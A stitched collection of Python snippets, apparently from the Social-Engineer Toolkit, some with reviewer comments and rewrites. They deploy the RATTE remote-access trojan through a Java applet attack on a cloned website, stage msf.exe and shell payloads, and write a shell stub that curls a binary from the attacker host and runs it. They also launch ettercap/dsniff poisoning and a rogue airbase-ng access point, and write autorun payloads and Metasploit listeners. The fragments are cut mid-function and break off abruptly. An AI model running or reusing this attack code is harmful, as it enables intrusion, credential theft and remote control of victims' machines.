    # NOTE(review): only 0 and values above 65535 are rejected; a negative
    # number passes this check (same for ratteport below).
    try:
        javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
    except ValueError:
        # core.print_info("Port set to default of 80")
        javaport = 80

    # The second port must additionally differ from javaport; a non-numeric
    # answer selects the default 8080 without repeating that comparison.
    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Порт не должен быть равен javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")

    # j0fer 06-27-2012 #        while valid_persistence != True:
    # j0fer 06-27-2012 #                persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # j0fer 06-27-2012 #                persistent=str.lower(persistent)
    # j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
    # j0fer 06-27-2012 #                        persistent="NO"
    # j0fer 06-27-2012 #                        valid_persistence = True
    # j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
    # j0fer 06-27-2012 #                       persistent="YES"
    # j0fer 06-27-2012 #                       valid_persistence = True
    # j0fer 06-27-2012 #                else:
    # j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    # The file name is passed on exactly as typed; an empty answer is allowed.
    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Запуск атаки Java-апплета..")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # NOTE(review): os.path.join() discards every component before an
    # absolute one, so with the leading slash this opens "/rand_gen" -- confirm
    # the intended location.
    with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
        # The last line of the file wins; ratte_random stays unbound if the
        # file is empty.
        for line in fileopen:
            ratte_random = line.rstrip()
        # NOTE(review): the file content is interpolated into a shell=True
        # command string, so any shell metacharacter in it is interpreted by
        # the shell; a plain file copy would not need a shell at all.
        subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Стартовый ратсервер...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
def prep_website():
        """Report that this feature is disabled, then hand control to return_continue()."""
        # No website preparation happens here: the body is only the notice
        # below followed by the file's return_continue() helper.
        print_info("This feature is currently under development and disabled.")
        return_continue()
    os.remove("src/program_junk/web_clone/msf.exe")
# Copy the msf.exe found in src/program_junk (when present) into the
# web_clone directory.
# NOTE(review): these two paths are relative to the current working
# directory, while the blocks below anchor their paths on definepath.
if os.path.isfile("src/program_junk/msf.exe"):
    shutil.copyfile("src/program_junk/msf.exe",
                    "src/program_junk/web_clone/msf.exe")

# For the SETSHELL selection, drop any earlier web_clone/x and replace it
# with the shell.windows file from src/payloads/set_payloads.
if payload_selection == "SETSHELL":
    if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)):
        os.remove("%s/src/program_junk/web_clone/x" % (definepath))
    shutil.copyfile(
        "%s/src/payloads/set_payloads/shell.windows" % (definepath),
        "%s/src/program_junk/web_clone/x" % (definepath))

# When the posix flag is set, also write a shell stub (web_clone/mac.bin).
if posix == True:
    setcore.print_info(
        "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload..."
    )
    # NOTE(review): file() is the Python 2 builtin; the handle is closed by
    # hand further down, so an exception in between would leave it open.
    filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath),
                     "w")
    # presumably webserver is a space-separated string whose second and
    # third fields are a host and a port -- TODO confirm against the caller
    payload_flags = webserver.split(" ")
    # random file name used inside the stub written below
    osx_name = setcore.generate_random_string(10, 10)
    # The stub is a /bin/sh script: curl fetches osx_name from
    # http://<payload_flags[1]>/, the file is made executable and started in
    # the background with payload_flags[1] and payload_flags[2] as arguments.
    # The transfer is plain HTTP and nothing in the stub checks the
    # downloaded file before running it.
    downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
        payload_flags[1], osx_name, osx_name, osx_name, payload_flags[1],
        payload_flags[2])
    filewrite.write(downloader)
    filewrite.close()
    # grab nix binary name
    linux_name = setcore.generate_random_string(10, 10)
    downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
        payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
Beispiel #17
    # if we are using ettercap
    if os.path.isfile(os.path.join(core.setdir, "ettercap")):
        with open(os.path.join(core.setdir, "ettercap")) as fileopen5:
            for line in fileopen5:
                ettercap = line.rstrip()
                # run in background
                ettercap += " &"
                # spawn ettercap or dsniff
                subprocess.Popen(ettercap,
                                 shell=True,
                                 stderr=subprocess.PIPE,
                                 stdout=subprocess.PIPE)

    # if metasploit config is in directory
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        core.print_info("Launching MSF Listener...")
        core.print_info("This may take a few to load MSF...")
        # this checks to see if we want to start a listener
        automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower()
        if automatic_listener != "off":
            # specify if we are using the multi pyinjector
            meta_config = "meta_config"
            if os.path.isfile(
                    os.path.join(core.setdir, "meta_config_multipyinjector")):
                meta_config = "meta_config_multipyinjector"
            # if we arent using a custom payload
            if custom != 1:
                child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
                    os.path.join(msf_path, "msfconsole"),
                    os.path.join(core.setdir, meta_config)))
            # check if we want to deliver emails or track users that click the
except: pass

# The init script doubles as the "is isc-dhcp-server installed?" probe; a
# miss only produces warnings and the script carries on.
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
    for notice in ("isc-dhcp-server does not appear to be installed.",
                   "apt-get install isc-dhcp-server to install it. Things may fail now."):
        core.print_warning(notice)

# Configured dnsspoof path missing: fall back to /usr/sbin/dnsspoof, or warn
# and call core.exit_set() when that is absent as well.
if not os.path.isfile(dnsspoof_path):
    if not os.path.isfile("/usr/sbin/dnsspoof"):
        core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
        core.exit_set()
    else:
        dnsspoof_path = "/usr/sbin/dnsspoof"

# Configured airbase-ng path missing: use the copy under src/wireless.
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    core.print_info("using SET's local airbase-ng binary")

# Explain the manual edit the operator is about to make.
for hint in ("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.",
             'This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")'):
    core.print_info(hint)
print("")
for step in ("SET will now launch nano to edit the file.",
             "Press ^X to exit nano and don't forget to save the updated file!"):
    core.print_status(step)
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()

# NOTE(review): the messages above talk about the isc-dhcp-server file and an
# INTERFACES= setting, while the command opens /etc/dhcp/dhcpd.conf -- confirm
# which file is meant. The command string is a constant, so shell=True carries
# no interpolated input here.
editor = subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True)
editor.wait()

# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
Beispiel #19
    core.print_warning("isc-dhcp-server does not appear to be installed.")
    core.print_warning(
        "apt-get install isc-dhcp-server to install it. Things may fail now.")

# Resolve the dnsspoof binary: keep the configured path when it exists,
# otherwise try the usual /usr/sbin location and call core.exit_set() when
# neither is present.
if not os.path.isfile(dnsspoof_path):
    fallback_dnsspoof = "/usr/sbin/dnsspoof"
    if os.path.isfile(fallback_dnsspoof):
        dnsspoof_path = fallback_dnsspoof
    else:
        core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
        core.exit_set()

# Resolve airbase-ng the same way, falling back to the copy under src/wireless.
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    core.print_info("using SET's local airbase-ng binary")

# Operator instructions for the manual configuration edit that follows.
edit_reason = "For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface."
edit_effect = 'This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")'
core.print_info(edit_reason)
core.print_info(edit_effect)
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
Beispiel #20
def prep_website():
    """Report that this feature is disabled, then hand control to return_continue()."""
    # The body is only the notice below followed by the file's
    # return_continue() helper; no website is prepared.
    print_info("This feature is currently under development and disabled.")
    return_continue()
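def _ask_port(prompt, default, forbidden=None):
    """Prompt for a TCP port and return it, or *default* on non-numeric input.

    prompt is the text handed to core.setprompt.  forbidden, when given, is a
    port that may not be chosen again.  A ValueError from int() -- an empty
    answer included -- selects *default*, on the first prompt or a re-prompt.
    """
    try:
        while True:
            port = int(raw_input(core.setprompt(["9", "2"], prompt)))
            if forbidden is not None and port == forbidden:
                core.print_warning("Port must not be equal to javaport!")
            # "<= 0" rather than "== 0": int() parses "-1" without complaint,
            # so a zero-only test lets negative ports through.
            if port <= 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if port > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            if 0 < port <= 65535 and port != forbidden:
                return port
    except ValueError:
        # NOTE(review): the default is returned without being compared to
        # `forbidden`, so both ports can still coincide when the first port
        # was set to this default by hand.
        return default


def main():
    """Interactively collect the RATTE settings and run the deployment steps.

    Prompts, in order, for the website to clone, the connect-back IP address,
    the applet port, the server port, the persistence choice and an optional
    file name.  It then calls prepare_ratte(), java_applet_attack_tw(), copies
    ratteM.exe into reports/ under the name read from rand_gen, calls
    ratte_listener_start() and finally stop_web_server_tw().

    Returns None.  The function returns early after three invalid website or
    IP answers.
    """
    # Local import: the file's import block is not visible from this block.
    import shutil

    # Get a *VALID* website address; the third failed attempt aborts.
    for attempt in range(3):
        website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        out_of_tries = attempt == 2

        if site.scheme in ("http", "https"):
            if site.netloc != "":
                break
            if out_of_tries:
                core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                sleep(4)
                return
            core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
        else:
            if out_of_tries:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            core.print_warning("I couldn't determine whether this is an http or https site. Try again?")

    # Same three-attempt policy for the connect-back address.
    for attempt in range(3):
        ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        if core.validate_ip(ipaddr):
            break
        if attempt == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
            return

    # Original author's note: the applet's web injection downloads over
    # port 80, so javaport is expected to stay at 80.
    javaport = _ask_port("Port Java applet should listen on [80]", 80)
    ratteport = _ask_port("Port RATTE Server should listen on [8080]", 8080,
                          forbidden=javaport)

    persistent = core.yesno_prompt(["9", "2"], "Should RATTE be persistent [no|yes]?")

    # NOTE(review): customexe goes to prepare_ratte() exactly as typed; no
    # length or character check is applied here.
    customexe = raw_input(core.setprompt(["9", "2"], "Use specific filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # The last line of rand_gen names the copy placed under reports/.
    # open() in a with-block replaces the Python 2-only file() call whose
    # handle was never closed.
    ratte_random = ""
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as rand_gen:
        for line in rand_gen:
            ratte_random = line.rstrip()

    if not ratte_random:
        # An empty rand_gen used to surface as a NameError further down.
        core.print_error("rand_gen is empty; cannot name the copy of ratteM.exe.")
        stop_web_server_tw()
        return

    # Copy in-process instead of building a "cp ..." string for shell=True:
    # paths containing spaces or shell metacharacters are then taken literally.
    source_path = "%s/src/program_junk/ratteM.exe" % (definepath)
    target_path = "%s/reports/%s" % (definepath, ratte_random)
    try:
        shutil.copy(source_path, target_path)
    except (IOError, OSError, shutil.Error) as copy_error:
        # The old cp call ignored its exit status, so a failed copy is
        # reported and the run continues, as before.
        core.print_error("Could not copy ratteM.exe to reports/: %s" % copy_error)

    #######################
    # start ratteserver
    #######################
    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return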
Beispiel #22
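# Directory the script was started from.
definepath = os.getcwd()

# grab config file
# open() inside a with-block replaces the Python 2-only file() builtin and
# closes the handle once the lines are read.
with open("config/set_config", "r") as config_handle:
    config = config_handle.readlines()
# grab our default directory
cwd = os.getcwd()
# both poisoning options default to 'n' until the config says otherwise
ettercapchoice = 'n'
dsniffchoice = 'n'
for line in config:
    # check for ettercap choice here
    match1 = re.search("ETTERCAP=ON", line)
    if match1:
        setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
        ettercapchoice = 'y'

    # check for dsniff choice here
    # NOTE(review): DSNIFF=ON resets ettercapchoice to 'n', but an
    # ETTERCAP=ON line appearing later in the file sets it back to 'y', so
    # the outcome depends on line order in set_config.
    match2 = re.search("DSNIFF=ON", line)
    if match2:
        setcore.print_info("DSNIFF DNS Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
        dsniffchoice = 'y'
        ettercapchoice = 'n'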

# GRAB CONFIG from SET
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
    # grab the ettercap interface
    match=re.search("ETTERCAP_INTERFACE=", line)
    if match:
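def main():
    """Run the interactive RATTE setup and the steps that follow it.

    The operator is asked for the website to clone, the connect-back IP
    address, the applet port, the server port, the persistence choice and an
    optional file name.  The answers are passed to prepare_ratte() and
    java_applet_attack_tw(); ratteM.exe is then copied into reports/ under
    the name read from rand_gen, ratte_listener_start() is called and
    stop_web_server_tw() ends the run.

    Returns None.  Three invalid website answers or three invalid IP answers
    end the function early.
    """
    # Local import: the file's import block is not visible from this block.
    import shutil

    max_attempts = 3

    def read_port(label, fallback, taken=None):
        """Return a port in 1..65535 (and != taken), or fallback on ValueError."""
        try:
            while True:
                answer = int(raw_input(core.setprompt(["9", "2"], label)))
                collides = taken is not None and answer == taken
                if collides:
                    core.print_warning("Port must not be equal to javaport!")
                # A zero-only test accepted negative numbers, which int()
                # parses without error; treat everything below 1 alike.
                if answer < 1:
                    core.print_warning(text.PORT_NOT_ZERO)
                if answer > 65535:
                    core.print_warning(text.PORT_TOO_HIGH)
                if not collides and 1 <= answer <= 65535:
                    return answer
        except ValueError:
            # Empty or non-numeric input, first prompt or re-prompt.
            # NOTE(review): fallback is not compared with `taken`.
            return fallback

    # Get a *VALID* website address
    attempts_used = 0
    while True:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        attempts_used += 1
        final_attempt = attempts_used == max_attempts

        if site.scheme not in ("http", "https"):
            if final_attempt:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            core.print_warning(
                "I couldn't determine whether this is an http or https site. Try again?"
            )
            continue

        if site.netloc != "":
            break

        if final_attempt:
            core.print_error(
                "\nMaybe you have the address written down wrong?" +
                core.bcolors.ENDC)
            sleep(4)
            return
        core.print_warning(
            "I can't determine the fqdn or IP of the site. Try again?")

    # Connect-back address, validated by core.validate_ip().
    attempts_used = 0
    while True:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        if core.validate_ip(ipaddr):
            break
        attempts_used += 1
        if attempts_used == max_attempts:
            core.print_error(
                "\nMaybe you have the address written down wrong?")
            sleep(4)
            return

    # Original author's note: the applet's web injection downloads over
    # port 80, so javaport is expected to stay at 80.
    javaport = read_port("Port Java applet should listen on [80]", 80)
    ratteport = read_port("Port RATTE Server should listen on [8080]", 8080,
                          taken=javaport)

    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistent [no|yes]?")

    # NOTE(review): customexe reaches prepare_ratte() exactly as typed; no
    # length or character check is applied here.
    customexe = raw_input(
        core.setprompt(
            ["9", "2"],
            "Use specific filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # rand_gen's last line is the file name used under reports/.  The
    # with-block closes the handle that file() used to leave open.
    ratte_random = ""
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()

    if ratte_random:
        # shutil.copy replaces a "cp ..." string run with shell=True, so the
        # paths are no longer parsed by a shell.
        try:
            shutil.copy("%s/src/program_junk/ratteM.exe" % (definepath),
                        "%s/reports/%s" % (definepath, ratte_random))
        except (IOError, OSError, shutil.Error) as copy_error:
            # cp's exit status was ignored before; keep going after a report.
            core.print_error(
                "Could not copy ratteM.exe to reports/: %s" % copy_error)
    else:
        # Previously an empty rand_gen raised NameError on ratte_random.
        core.print_error(
            "rand_gen is empty; cannot name the copy of ratteM.exe.")
        stop_web_server_tw()
        return

    #######################
    # start ratteserver
    #######################

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return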
    # if using pdf payload
    elif trigger == 2:
        payload = "template.pdf"

    elif trigger == 3:
        payload = "openthis.wab"

    else:
        payload = ""

    filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))

core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")

# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
    choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
    if choice1.lower() == "yes" or choice1.lower() == "y":
        # if we used something to create other than solo.py then write out the
        # listener
        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
                for line in fileopen:
                    line = line.split(" ")
                    filewrite.write("use multi/handler\n")
                    filewrite.write("set payload {0}\n".format(line[0]))
                    filewrite.write("set lhost {0}\n".format(line[1]))